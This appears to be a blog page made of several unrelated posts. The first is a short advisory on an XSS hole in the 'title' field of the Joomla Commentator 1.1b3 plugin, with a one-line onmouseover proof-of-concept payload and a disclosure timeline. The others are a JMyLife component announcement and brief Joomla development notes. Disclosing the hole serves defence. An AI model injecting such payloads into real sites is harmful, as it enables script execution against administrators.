Joomla Commentator 1.1b3, a Joomla commenting plugin, suffers from an XSS vulnerability in its "title" field that enables attackers to possibly run scripts as an administrator.

title"/onmouseover="alert(/xss/.source)

Timeline

• Vulnerabilities Discovered: 3 November 2009
• Vendor Notified: 3 November 2009
• Vendor Response: ... 2009
• Update Available: ... 2009
• Disclosure: 15 November 2009

I am proud to announce the release of JMyLife 1.0, a new Joomla component by yours truly! JMyLife aims to replicate the functionality of fmylife.com in a Joomla 1.5 native component!

There are 2 versions available: JMyLife 1.0 FREE, which has the bare essentials, and JMyLife 1.0 Pro, with all the bells and whistles!

View the demo here - JMyLife Component Demo.

Overview of Features

When you purchase the Pro version, ALL minor updates (until 1.1) will be included, and you will be supporting future development of this project.

I was doing some restructuring to my soon-to-be-released Joomla component, JMyLife, and wanted to have a slect item in the configuration view in order to allow the admin to select a page to direct users to as a "sign up" page. I originally had this item as part of the global view parameters, but I was having issues with Menu Items overriding the global values on specific views. I started digging through the Joomla API documents, expecting to find a simple JHTML statement I could use to produce this form element, but couldn't. I ended up with a solution that works, though I wish it were a bit easier.

As part of a recent project, I needed to open a modal window using Javascript. Here's how I did it.